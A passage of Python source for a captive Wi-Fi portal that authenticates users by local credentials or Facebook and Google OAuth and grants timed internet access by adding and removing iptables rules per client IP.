SSO_GOOGLE_EXCLUDE_DOMAINS_COUNTRIES = ['.com', '.ac', '.ad', '.ae', '.com.af', '.com.ag', '.com.ai', '.al', '.am', '.co.ao', '.com.ar', '.as', '.at', '.com.au', '.az', '.ba', '.com.bd', '.be', '.bf', '.bg', '.com.bh', '.bi', '.bj', '.com.bn', '.com.bo', '.com.br', '.bs', '.bt', '.co.bw', '.by', '.com.bz', '.ca', '.com.kh', '.cc', '.cd', '.cf', '.cat', '.cg', '.ch', '.ci', '.co.ck', '.cl', '.cm', '.cn', '.com.co', '.co.cr', '.com.cu', '.cv', '.com.cy', '.cz', '.de', '.dj', '.dk', '.dm', '.com.do', '.dz', '.com.ec', '.ee', '.com.eg', '.es', '.com.et', '.fi', '.com.fj', '.fm', '.fr', '.ga', '.ge', '.gf', '.gg', '.com.gh', '.com.gi', '.gl', '.gm', '.gp', '.gr', '.com.gt', '.gy', '.com.hk', '.hn', '.hr', '.ht', '.hu', '.co.id', '.iq', '.ie', '.co.il', '.im', '.co.in', '.io', '.is', '.it', '.je', '.com.jm', '.jo', '.co.jp', '.co.ke', '.ki', '.kg', '.co.kr', '.com.kw', '.kz', '.la', '.com.lb', '.com.lc', '.li', '.lk', '.co.ls', '.lt', '.lu', '.lv', '.com.ly', '.co.ma', '.md', '.me', '.mg', '.mk', '.ml', '.com.mm', '.mn', '.ms', '.com.mt', '.mu', '.mv', '.mw', '.com.mx', '.com.my', '.co.mz', '.com.na', '.ne', '.com.nf', '.com.ng', '.com.ni', '.nl', '.no', '.com.np', '.nr', '.nu', '.co.nz', '.com.om', '.com.pk', '.com.pa', '.com.pe', '.com.ph', '.pl', '.com.pg', '.pn', '.com.pr', '.ps', '.pt', '.com.py', '.com.qa', '.ro', '.rs', '.ru', '.rw', '.com.sa', '.com.sb', '.sc', '.se', '.com.sg', '.sh', '.si', '.sk', '.com.sl', '.sn', '.sm', '.so', '.st', '.sr', '.com.sv', '.td', '.tg', '.co.th', '.com.tj', '.tk', '.tl', '.tm', '.to', '.tn', '.com.tr', '.tt', '.com.tw', '.co.tz', '.com.ua', '.co.ug', '.co.uk', '.com', '.com.uy', '.co.uz', '.com.vc', '.co.ve', '.vg', '.co.vi', '.com.vn', '.vu', '.ws', '.co.za', '.co.zm', '.co.zw']
SSO_GOOGLE_EXCLUDE_IPS = []
SSO_FACEBOOK_EXCLUDE_IPS = []
# Credentials Sign in
CREDENTIALS_SIGNIN = True
SQLITE3_DATABASE_PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'users.db')
# Create remote link
REMOTE_SERVER_LINK = "https://" + REMOTE_SERVER_DOMAIN + ":" + str(HTTPS_SERVER_PORT) + "/"
if str(HTTPS_SERVER_PORT) == "443":
REMOTE_SERVER_LINK = "https://" + REMOTE_SERVER_DOMAIN + "/"
# Authorizations Daemon
AUTHDAEMON_INTERVAL_CHECK = 10
AUTHDAEMON_MAC_CHANGE_CHECK = True
# Access Times
ACCESS_TIME_INTERNET = 2*60*60
ACCESS_TIME_FACEBOOK_LOGIN = 2*60
ACCESS_TIME_GOOGLE_LOGIN = 2*60
LOG_DEBUG = 0
LOG_VERBOSE = 2
LOG_NORMAL = 4
#LOG_LEVEL = LOG_NORMAL
LOG_LEVEL = LOG_NORMAL
''' Database
-----------------------------------'''
database = None
class Database:
def __init__(self):
# Init path
self.path = SQLITE3_DATABASE_PATH
# Try to connect to db
try:
self.conn = sqlite3.connect(self.path, check_same_thread=False)
except sqlite3.Error as e:
self.conn = None
self.log("Error: " + str(e))
return;
# Create dummy password
self.dummy_pass = self.hash_password('dummy')
# Init users table
self.conn.execute('CREATE TABLE IF NOT EXISTS users (username TEXT PRIMARY KEY, password_hash TEXT)')
# Init tokens table
#self.conn.execute('CREATE TABLE IF NOT EXISTS tokens (hash TEXT PRIMARY KEY, seconds int)')
def createUser(self, username, password):
try:
self.conn.execute('INSERT INTO users (username, password_hash) VALUES (?, ?)', (username, self.hash_password(password)))
self.conn.commit()
return True
except sqlite3.Error as e:
self.log("Failed: " + str(e))
return False
def authenticateUser(self, username, password):
c = self.conn.cursor()
c.execute("SELECT password_hash FROM users WHERE username = ?", (username,))
data = c.fetchone()
if not data or len(data) < 1:
# Dummy calculations to avoid time attack
self.verify_password(self.dummy_pass, 'invalid-dummy')
return False
else:
return self.verify_password(data[0], password)
# Hash a password for storing.
def hash_password(self, password, alg='sha512'):
salt = hashlib.sha256(os.urandom(60)).hexdigest().encode('ascii')
pwdhash = hashlib.pbkdf2_hmac(alg, password.encode('utf-8'), salt, 100000)
pwdhash = binascii.hexlify(pwdhash)
return (salt + pwdhash).decode('ascii')
# Verify a stored password against one provided by user
def verify_password(self, stored_password, provided_password, alg='sha512'):
salt = stored_password[:64]
stored_password = stored_password[64:]
pwdhash = hashlib.pbkdf2_hmac(alg, provided_password.encode('utf-8'), salt.encode('ascii'), 100000)
pwdhash = binascii.hexlify(pwdhash).decode('ascii')
return pwdhash == stored_password
def log(self, message, level = LOG_LEVEL):
msgLog("Database", message, level)
''' Authorizations Monitor Daemon
-----------------------------------'''
authDaemon = None
class AuthorizationsDaemon:
def __init__(self):
self.authorizations = {}
self.clients = {}
self.sessions = []
self.ip_sessions = {}
def runChecks(self):
self.checkExpiredSessions()
self.checkMacBindings()
def checkExpiredSessions(self):
now = datetime.datetime.now()
expired = []
for session in self.sessions:
if session["expiration"] < now:
expired.append(session)
# Revoke authorization on expired session
self.deauthorizeSessions(expired)
def checkMacBindings(self):
now = datetime.datetime.now()
clients = getArpList()
for client in clients:
ip = client["ip"]
mac = client["mac"]
# If client was previously logged
if ip in self.clients.keys() and self.clients[ip]["mac"] != None:
# Check if MAC matches previous MAC
if AUTHDAEMON_MAC_CHANGE_CHECK != False and self.clients[ip]["mac"] != mac:
self.log("MAC change detected on " + ip + " : " + self.clients[ip]["mac"] + " --> " + mac)
# De-authorize client
self.clients[ip]["mac"] = None
self.clients[ip]["logged"] = now
self.deauthorizeIP_All(ip);
# Log user
else:
self.clients[ip] = {
"mac" : mac,
"logged" : now
}
def prepare_session(self, ip, stype, expiration):
session = {
"ip" : ip,
"mac" : getMacFromIp(ip),
"type" : stype,
"expiration" : expiration
}
return session
# Update Authorizations
def reauthorizeSession(self, session, seconds):
self.log("Update " + session["ip"] + " to " + session["type"])
session["expiration"] = datetime.datetime.now() + datetime.timedelta(seconds=seconds)
def reauthorizeSessions(self, sessions, seconds):
for session in sessions:
self.reauthorizeSession(session, seconds)
# Authorizations
def authorizeSession(self, session):
self.log("Authorize " + session["ip"] + " to " + session["type"])
self.sessions.append(session)
ip = session["ip"]
if not (ip in self.ip_sessions.keys()):
self.ip_sessions[ip] = []
self.ip_sessions[ip].append(session)
# Allow access to Internet
if session["type"] == "Internet":
# The nat rule has to be inserted under the captive's portal domain
callCmd(["iptables", "-t", "nat", "-I", "PREROUTING", "2", "-s", ip, "-j" ,"ACCEPT"])
callCmd(["iptables", "-I", "FORWARD", "1", "-s", ip, "-j" ,"ACCEPT"])
# Allow access to Facebook
elif session["type"] == "Facebook-Login":
# Allow Facebook IPs
for ip_addresses in SSO_FACEBOOK_EXCLUDE_IPS:
callCmd(["iptables", "-I", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Allow access to Google
elif session["type"] == "Google-Login":
# Allow Google IPs
for ip_addresses in SSO_GOOGLE_EXCLUDE_IPS:
callCmd(["iptables", "-I", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Update client info
self.setClientAuthorizations(ip, session["type"], True)
def authorizeSessions(self, sessions):
for session in sessions:
self.authorizeSession(self, session)
def authorizeIP_Internet(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Internet")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Internet", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
def authorizeIP_FacebookLogin(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Facebook-Login")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Facebook-Login", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
def authorizeIP_GoogleLogin(self, ip, seconds):
sessions = self.getSessionsByIP(ip, "Google-Login")
if len(sessions) > 0:
self.reauthorizeSessions(sessions, seconds)
else:
session = self.prepare_session(ip, "Google-Login", datetime.datetime.now() + datetime.timedelta(seconds=seconds))
self.authorizeSession(session)
# De-authorizations
def deauthorizeSession(self, session):
self.log("De-authorize " + session["ip"] + " from " + session["type"])
self.sessions.remove(session)
ip = session["ip"]
if ip in self.ip_sessions.keys():
self.ip_sessions[ip].remove(session)
# Block access to Internet
if session["type"] == "Internet":
callCmd(["iptables", "-t", "nat", "-D", "PREROUTING", "-s", ip, "-j" ,"ACCEPT"])
callCmd(["iptables", "-D", "FORWARD", "-s", ip, "-j" ,"ACCEPT"])
# Block access to Facebook
elif session["type"] == "Facebook-Login":
# Allow Facebook IPs
for ip_addresses in SSO_FACEBOOK_EXCLUDE_IPS:
callCmd(["iptables", "-D", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Block access to Google
elif session["type"] == "Google-Login":
# Allow Google IPs
for ip_addresses in SSO_GOOGLE_EXCLUDE_IPS:
callCmd(["iptables", "-D", "FORWARD", "-i", INTERFACE_INPUT, "-p", "tcp", "-s", ip, "-d", ip_addresses, "--dport", str(443), "-j" , "ACCEPT"])
# Update client info
self.setClientAuthorizations(ip, session["type"], False)
def deauthorizeSessions(self, sessions):
for session in sessions:
self.deauthorizeSession(session)
def deauthorizeIP_Internet(self, ip):
session = self.getSessionsByIP(ip, "Internet")
self.deauthorizeSessions(session)
def deauthorizeIP_FacebookLogin(self, ip):
session = self.getSessionsByIP(ip, "Facebook-Login")
self.deauthorizeSessions(session)
def deauthorizeIP_GoogleLogin(self, ip):
session = self.getSessionsByIP(ip, "Google-Login")
self.deauthorizeSessions(session)
def deauthorizeIP_All(self, ip):
session = self.getSessionsByIP(ip)
self.deauthorizeSessions(session)
# Client info
def getClientAuthorizations(self, ip):
if not (ip in self.authorizations.keys()):
self.authorizations[ip] = {
"Internet" : False,
"Facebook-Login" : False,
"Google-Login" : False
}
return self.authorizations[ip]
def setClientAuthorizations(self, ip, stype, value):
self.getClientAuthorizations(ip)
self.authorizations[ip][stype] = value
def hasClientAuthorization(self, ip, stype):
info = self.getClientAuthorizations(ip);
if stype in self.authorizations[ip].keys():
return self.authorizations[ip][stype]
return False
def hasClient_Internet(self, ip):
return self.hasClientAuthorization(ip, "Internet")
# Other function
def getSessionsByIP(self, ip, stype=None):
sessions = []
if ip in self.ip_sessions.keys():
for session in self.ip_sessions[ip]:
if stype == None or stype == session["type"]:
sessions.append(session)
return sessions
def log(self, message, level = LOG_LEVEL):
msgLog("AuthDaemon", message, level)
''' HTTPS Captive Portal (Main Captive Portal)
-----------------------------------'''
# This it the HTTP server used by the the captive portal
class CaptivePortal(http.server.BaseHTTPRequestHandler):
server_variables = {
"server-ip" : LOCAL_SERVER_IP,
"server-port" : HTTPS_SERVER_PORT,
"footer-note" : "© Unipi " + str(datetime.datetime.now().year)
}
sessions = {}
route = {
#"/index": {"file": "index.html", "cached": False},
"/login": {"file": "login.html", "cached": False},
"/status": {"file": "status.html", "cached": False},
"/favicon.ico": {"file": "favicon.ico", "cached": False},
"/css/custom.css": {"file": "css/custom.css", "cached": False},
"/css/bootstrap.min.css": {"file": "css/bootstrap.min.css", "cached": False},
"/css/bootstrap.lumen.min.css": {"file": "css/bootstrap.lumen.min.css", "cached": False},
"/js/jquery.min.js": {"file": "js/jquery.min.js", "cached": False},
"/js/popper.min.js": {"file": "js/popper.min.js", "cached": False},
"/js/bootstrap.min.js": {"file": "js/bootstrap.min.js", "cached": False},
"/img/portal.png": {"file": "img/portal.png", "cached": False},
"/img/portal-other.png": {"file": "img/portal-other.png", "cached": False},
# Other pages
".redirect": {"file": "redirect.html", "cached": False},
".message": {"file": "message.html", "cached": False},
".credentials": {"file": "credentials.html", "cached": False},
".terms": {"file": "ToU.txt", "cached": False},
}
route_alias = {
"/": "/login"
}
def get_route(self, method, rawUrl):
# Analise URL
url = urllib.parse.urlparse(rawUrl)
parms = urllib.parse.parse_qs(url.query)
path = url.path
# Check alias
if path in self.route_alias.keys():
path = self.route_alias[path]
# Get file
data = self.get_file(path);
# Headers
headers = {}
# Status
status = 200
# Print info
msgLog("Portal", "Request " + path, LOG_VERBOSE)
msgLog("Portal", "User-Agent " + self.headers["User-Agent"], LOG_DEBUG)
#print("url : " + rawUrl)
#print("path : " + path)
# Login Page
if path == '/login':
# Check if logged in
loggedin = self.get_logged_in()
if loggedin == "Facebook" or loggedin == "Google":
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
# Check if webview (google does not allow login from webview)
isWebView = self.isWebView()
# Replace data
data = self.replace_keys_decode(data, {
# CREDENTIALS_SIGNIN
"credentials-btn-type" : ("btn-info" if CREDENTIALS_SIGNIN else "d-none"),
"credentials-link" : "/credentials",
"facebook-btn-type" : ("btn-primary" if SSO_FACEBOOK else "d-none"),
"facebook-link" : "/facebook/init",
"google-btn-type" : (("btn-secondary" if isWebView else "btn-primary") if SSO_GOOGLE else "d-none"),
"google-link" : "/google/init"
})
# Logout page
if path == '/logout':
self.set_logged_out()
data, headers, status = self.do_redirect("/", "<p>Logging out...</p>", 5)
# Status page
elif path == '/status':
info = getRuleFromIp(self._session["ip"])
if info == None:
info = {"packets" : 0, "bytes" : 0}
# Check if logged in
loggedin = self.get_logged_in()
if loggedin == "Facebook":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.facebook_get_user_name()),
"login-type" : "Facebook Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
elif loggedin == "Google":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.google_get_user_name()),
"login-type" : "Google Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
elif loggedin == "Credentials":
data = self.replace_keys_decode(data, {
"title" : "Connected",
"name" : html.escape(self.credentials_get_user_name()),
"login-type" : "Credentials Login",
"packets" : format(info["packets"],',d'),
"bytes" : bytes_sizeof_format(info["bytes"]),
"refresh-link" : "/status",
"logout-link" : "/logout"
})
else:
data, headers, status = self.do_redirect("/login", "<p>Redirecting...</p>")
# Credentials
elif CREDENTIALS_SIGNIN and path == '/credentials':
alert = {"type" : "d-none", "message" : ""}
authenticated = False
if method == 'POST':
form = self.parse_posted_data()
if form != None and not ('checkbox' in form.keys()):
alert["type"] = "alert-danger"
alert["message"] = "Please accept the terms"
elif form != None and ('username' in form.keys()) and ('password' in form.keys()):
authenticated = database.authenticateUser(form['username'], form['password'])
if authenticated:
authenticated = form['username']
else:
alert["type"] = "alert-danger"
alert["message"] = "Authentication failed"
else:
alert["type"] = "alert-danger"
alert["message"] = "Invalid data posted"
if not authenticated:
data = self.get_file(".credentials");
data = self.replace_keys_decode(data, {
"action-link" : "credentials",
"checkbox-class" : "", #"d-none",
"checkbox-html" : 'Accept the <a href="/terms">Terms of Use</a>',
# Alet info
"alert-type" : alert["type"], #alert-danger
"alert-message" : alert["message"],
})
else:
self.credentials_auth(authenticated)
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
elif CREDENTIALS_SIGNIN and path == '/terms':
#headers = {"Content-type": "text/html; charset=UTF-8"}
txt = self.get_file(".terms").decode("utf-8");
data, headers, status = self.do_message(
"Terms of Use",
("<p style=\"text-align: left;\">%s</p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(txt).replace("\n","<br>"), REMOTE_SERVER_LINK)
)
# Facebook - Pre-Oauth
elif SSO_FACEBOOK and path == '/facebook/init':
fb_redirect = self.facebook_pre_oauth()
data, headers, status = self.do_redirect(fb_redirect, "<p>You have %d seconds to sign in...</p>" % ACCESS_TIME_FACEBOOK_LOGIN, 5)
# Facebook - Post-Oauth
elif SSO_FACEBOOK and path == '/facebook/oauth':
fb_authcode = ''
fb_state = ''
if ('code' in parms.keys()) and ('state' in parms.keys()):
fb_authcode = parms['code'][0]
fb_state = parms['state'][0]
error = self.facebook_post_oauth(fb_authcode, fb_state)
if error == None:
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
data, headers, status = self.do_message(
"Failed",
("<p>Failed to login with Facebook</p><p><small>Error: %s</small></p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(error), REMOTE_SERVER_LINK)
)
# Google - Pre-Oauth
elif SSO_GOOGLE and path == '/google/init':
if self.isWebView():
data, headers, status = self.do_message(
"Failed",
("<p>This browser does not support Google sign in.<br>" +
"Please open this page using another browser (e.g. Chrome, Firefox)</p>" +
"<input type=\"text\" value=\"%s\" style=\"text-align:center;\"><br><br>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (REMOTE_SERVER_LINK, REMOTE_SERVER_LINK)
)
else:
gg_redirect = self.google_pre_oauth()
data, headers, status = self.do_redirect(gg_redirect, "<p>You have %d seconds to sign in...</p>" % ACCESS_TIME_GOOGLE_LOGIN, 5)
# Google - Post-Oauth
elif SSO_GOOGLE and path == '/google/oauth':
gg_code = ''
gg_scope = ''
if ('code' in parms.keys()) and ('scope' in parms.keys()):
gg_code = parms['code'][0]
gg_scope = parms['scope'][0]
error = self.google_post_oauth(gg_code, gg_scope)
if error == None:
self.authorize_internet()
data, headers, status = self.do_redirect("/status", "<p>Redirecting...</p>")
else:
data, headers, status = self.do_message(
"Failed",
("<p>Failed to login with Google</p><p><small>Error: %s</small></p>" +
"<a href=\"%s\" class=\"btn btn-outline-primary\">< Back</a>" +
"") % (html.escape(error), REMOTE_SERVER_LINK)
)
return data, headers, status;
def parse_posted_data(self):
data = None
if 'Content-Length' in self.headers.keys():
length = int(self.headers['Content-Length'])
body = self.rfile.read(length)
if 'Content-Type' in self.headers.keys():
if self.headers['Content-Type'] == "application/x-www-form-urlencoded":
binary = urllib.parse.parse_qs(body)
data = {}
for key in binary.keys():
data[key.decode('ascii')] = binary[key][0].decode('ascii')
return data
def get_logged_in(self):
if self.session_hasInternet():
date = self.session_get("authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
date = self.session_get("fb-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
fb_user_info = self.session_get("fb-user-info", None)
if (fb_user_info != None) and ("name" in fb_user_info.keys()):
return "Facebook"
date = self.session_get("gg-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
gg_user_info = self.session_get("gg-user-info", None)
if (gg_user_info != None) and ("name" in gg_user_info.keys()):
return "Google"
date = self.session_get("cr-authorized", datetime.datetime(1970, 1, 1))
if date > datetime.datetime.now():
cr_user_info = self.session_get("cr-user-info", None)
if (cr_user_info != None) and ("name" in cr_user_info.keys()):
return "Credentials"
return None
def set_logged_out(self):
self.deauthorize_internet()
self.facebook_deoauth()
self.google_deoauth()
self.credentials_deoauth()
# Credentials
def credentials_auth(self, username):
user_info = {"name" : username}
# Save session data
self.session_set("cr-user-info", user_info)
self.session_set("cr-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Credentials", "Authorized user \"" + user_info["name"] + "\"")
return None
def credentials_deoauth(self):
self.session_set("cr-user-info", None)
self.session_set("cr-authorized", datetime.datetime(1970, 1, 1))
def credentials_get_user_name(self):
return self.session_get("cr-user-info", {"name":"Unknown"})["name"]
# Facebook Login
def facebook_deoauth(self):
self.session_set("fb-access-token", None)
self.session_set("fb-user-info", None)
self.session_set("fb-state", None)
self.session_set("fb-authorized", datetime.datetime(1970, 1, 1))
def facebook_pre_oauth(self):
self.facebook_deoauth()
authDaemon.authorizeIP_FacebookLogin(self._session["ip"], ACCESS_TIME_FACEBOOK_LOGIN)
fb_state = binascii.b2a_hex(os.urandom(32)).decode("utf-8")
self.session_set("fb-state", fb_state)
return "https://www.facebook.com/v7.0/dialog/oauth?client_id=%s&redirect_uri=%s&state=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", fb_state)
def facebook_post_oauth(self, fb_authcode, fb_state):
authDaemon.deauthorizeIP_FacebookLogin(self._session["ip"])
# Check state
if not (fb_state == self.session_get("fb-state", None)):
return "Invalid oauth state."
# Get Facebook access token
#print("https://graph.facebook.com" + ("/v7.0/oauth/access_token?client_id=%s&redirect_uri=%s&client_secret=%s&code=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", SSO_FACEBOOK_APP_SECRET, fb_authcode)))
conn = http.client.HTTPSConnection("graph.facebook.com")
conn.request("GET", "/v7.0/oauth/access_token?client_id=%s&redirect_uri=%s&client_secret=%s&code=%s" % (SSO_FACEBOOK_APP_ID, REMOTE_SERVER_LINK + "facebook/oauth", SSO_FACEBOOK_APP_SECRET, fb_authcode))
res = conn.getresponse()
#print(type(res.status), res.status)
#print(type(res.reason), res.reason)
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
# Parse response
fb_access_token = json.loads(response)
if not ("access_token" in fb_access_token.keys()):
return "Failed to get access token."
fb_access_token = fb_access_token["access_token"]
# Get user info
conn = http.client.HTTPSConnection("graph.facebook.com")
conn.request("GET", "/v7.0/me?fields=id,name,email&access_token=%s" % (fb_access_token))
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
fb_user_info = json.loads(response)
if not ("id" in fb_user_info.keys() and "name" in fb_user_info.keys()):
return "Failed to get user info."
# Save session data
self.session_set("fb-access-token", fb_access_token)
self.session_set("fb-user-info", fb_user_info)
self.session_set("fb-state", None)
self.session_set("fb-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Facebook", "Authorized Facebook user \"" + fb_user_info["name"] + "\" [#" + fb_user_info["id"] + "]")
return None
def facebook_get_user_id(self):
return self.session_get("fb-user-info", {"id":0})["id"]
def facebook_get_user_name(self):
return self.session_get("fb-user-info", {"name":"Unknown"})["name"]
# Google Login
def google_deoauth(self):
self.session_set("gg-access-token", None)
self.session_set("gg-refresh-token", None)
self.session_set("gg-user-info", None)
self.session_set("gg-code-verifier", None)
self.session_set("gg-authorized", datetime.datetime(1970, 1, 1))
def google_pre_oauth(self):
self.google_deoauth()
authDaemon.authorizeIP_GoogleLogin(self._session["ip"], ACCESS_TIME_GOOGLE_LOGIN)
gg_code_verifier = binascii.b2a_hex(os.urandom(32)).decode("utf-8")
self.session_set("gg-code-verifier", gg_code_verifier)
return "https://accounts.google.com/o/oauth2/v2/auth?client_id=%s&redirect_uri=%s&code_challenge=%s&response_type=code&scope=email profile" % (SSO_GOOGLE_CLIENT_ID, REMOTE_SERVER_LINK + "google/oauth", gg_code_verifier)
def google_post_oauth(self, gg_code, gg_scope):
authDaemon.deauthorizeIP_GoogleLogin(self._session["ip"])
# Check scope?
# Get code verifier
gg_code_verifier = self.session_get("gg-code-verifier", None)
if gg_code_verifier == None:
return "Invalid oauth code verifier."
# Wait
time.sleep(0.5)
# Get Google access token
conn = http.client.HTTPSConnection("oauth2.googleapis.com")
conn.request("POST", "/token", urllib.parse.urlencode({
"client_id" : SSO_GOOGLE_CLIENT_ID,
"client_secret" : SSO_GOOGLE_CLIENT_SECRET,
"code" : gg_code,
"code_verifier" : gg_code_verifier,
"grant_type" : "authorization_code",
"redirect_uri" : REMOTE_SERVER_LINK + "google/oauth",
}), {
"Content-type": "application/x-www-form-urlencoded",
#"Accept": "text/plain"
})
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
# Parse response
gg_data = json.loads(response)
if not ("access_token" in gg_data.keys()):
return "Failed to get access token."
gg_access_token = gg_data["access_token"]
#gg_refresh_token = gg_data["refresh_token"]
#gg_expire_in = gg_data["expires_in"]
# Get user info
conn = http.client.HTTPSConnection("www.googleapis.com")
conn.request("GET", "/oauth2/v2/userinfo?access_token=%s" % (gg_access_token))
res = conn.getresponse()
#if res.status != 200 or res.reason != "OK":
# return "Invalid status was returned (%s,%s)." % (str(res.status), res.reason)
response = res.read()
conn.close()
gg_user_info = json.loads(response)
if not ("id" in gg_user_info.keys() and "name" in gg_user_info.keys()):
return "Failed to get user info."
# Save session data
self.session_set("gg-access-token", gg_access_token)
#self.session_set("gg-refresh-token", gg_refresh_token)
self.session_set("gg-user-info", gg_user_info)
self.session_set("gg-code-verifier", None)
self.session_set("gg-authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
msgLog("Google", "Authorized Google user \"" + gg_user_info["name"] + "\" [#" + gg_user_info["id"] + "]")
return None
def google_get_user_id(self):
return self.session_get("gg-user-info", {"id":0})["id"]
def google_get_user_name(self):
return self.session_get("gg-user-info", {"name":"Unknown"})["name"]
def isWebView(self):
# Check requested with header
if ("X-Requested-With" in self.headers.keys()):
# Android Web View
if self.headers["X-Requested-With"] == "com.android.htmlviewer":
return True
# Check browser user agent
if ("User-Agent" in self.headers.keys()):
# Android Web View
if "; wv" in self.headers["User-Agent"]:
return True
# Probably not
return False
def get_file(self, name):
# If route exists
if name in self.route.keys():
if self.route[name]["cached"] == None:
return self.load_file(self.route[name]["file"])
# If not cached
if self.route[name]["cached"] == False:
self.route[name]["cached"] = self.load_file(self.route[name]["file"])
# Return file
return self.route[name]["cached"]
# File not found
return None
def load_file(self, path):
# Calculate path
path = os.path.join(PAGES_PATH, path)
# Load file
file = open(path, "rb")
data = file.read()
file.close()
# If HTML
name, ext = os.path.splitext(path)
if ext == ".html":
data = self.replace_keys_decode(data, self.server_variables)
# Return file
return data
def replace_keys(self, html, variables):
for name, value in variables.items():
html = html.replace("{{" + name + "}}", str(value))
return html
def replace_keys_decode(self, data, variables):
return self.replace_keys(data.decode("utf-8"), variables).encode()
def get_content_type(self, ext):
# Common files
if ext == ".css" :
return "text/css"
elif ext == ".css" :
return "text/css"
elif ext == ".html" :
return "text/html"
elif ext == ".js" :
return "text/javascript"
elif ext == ".png" :
return "image/png"
elif ext == ".jpg" or ext == ".jpeg" :
return "image/jpeg"
elif ext == ".svg" :
return "image/svg+xml"
elif ext == ".ico" :
return "image/x-icon"
elif ext == ".txt" :
return "text/plain"
elif ext == ".crt" :
return "application/x-x509-ca-cert"
elif ext == ".pdf" :
return "application/pdf"
return "text/html"
def session_init(self):
ip = self.client_address[0]
#mac = getMacFromIp(ip)
self._session = {
"ip" : ip,
#"mac" : mac
}
if not (ip in self.sessions.keys()):
self.sessions[ip] = {
"ip" : ip,
#"mac" : mac,
"data" : {}
}
return
def session_hasInternet(self):
if authDaemon.hasClient_Internet(self._session["ip"]) == False:
return False
return True
def session_set(self, key, value):
self.sessions[self._session["ip"]]["data"][key] = value
def session_get(self, key, defvalue):
if key in self.sessions[self._session["ip"]]["data"].keys():
return self.sessions[self._session["ip"]]["data"][key]
else:
return defvalue
def authorize_internet(self):
ip = self._session["ip"]
self.session_set("authorized", datetime.datetime.now() + datetime.timedelta(seconds=ACCESS_TIME_INTERNET))
authDaemon.authorizeIP_Internet(self._session["ip"], ACCESS_TIME_INTERNET)
def deauthorize_internet(self):
ip = self._session["ip"]
self.session_set("authorized", datetime.datetime(1970, 1, 1))
authDaemon.deauthorizeIP_All(self._session["ip"])
# Handle GET requests
def do_GET(self):
self.session_init()
# Get file
body, headers, status = self.get_route('GET', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
# Handle POST requests
def do_POST(self):
self.session_init()
# Get file
body, headers, status = self.get_route('POST', self.path)
if body == None :
self.send_response(404)
self.send_header("Content-type", "text/html")
self.end_headers()
self.wfile.write(str("404: file not found").encode())
return
# Path info
file_name, file_extension = os.path.splitext(self.path)
# Create headers
self.send_response(status)
self.send_header("Content-type", self.get_content_type(file_extension))
for key, value in headers.items():
self.send_header(key, value)
self.end_headers()
# Return file
self.wfile.write(body)
def do_redirect(self, location, message, seconds = 0):
#status = 302
status = 200
headers = {"Location": location}
data = self.get_file(".redirect");
data = self.replace_keys_decode(data, {
"location" : location,
"message" : message,
"seconds" : str(seconds)
})
return data, headers, status;
def do_message(self, title, message):
status = 200
headers = {}
data = self.get_file(".message");
data = self.replace_keys_decode(data, {
"title" : title,
"message" : message
})
return data, headers, status;
#the following function makes server produce no output
#comment it out if you want to print diagnostic messages
def log_message(self, format, *args):
return
''' HTTP Captive Portal
-----------------------------------'''
class RedirectPortal(CaptivePortal):
route = {
"/favicon.ico": {"file": "favicon.ico", "cached": False},
"/css/custom.css": {"file": "css/custom.css", "cached": False},
"/css/bootstrap.min.css": {"file": "css/bootstrap.min.css", "cached": False},
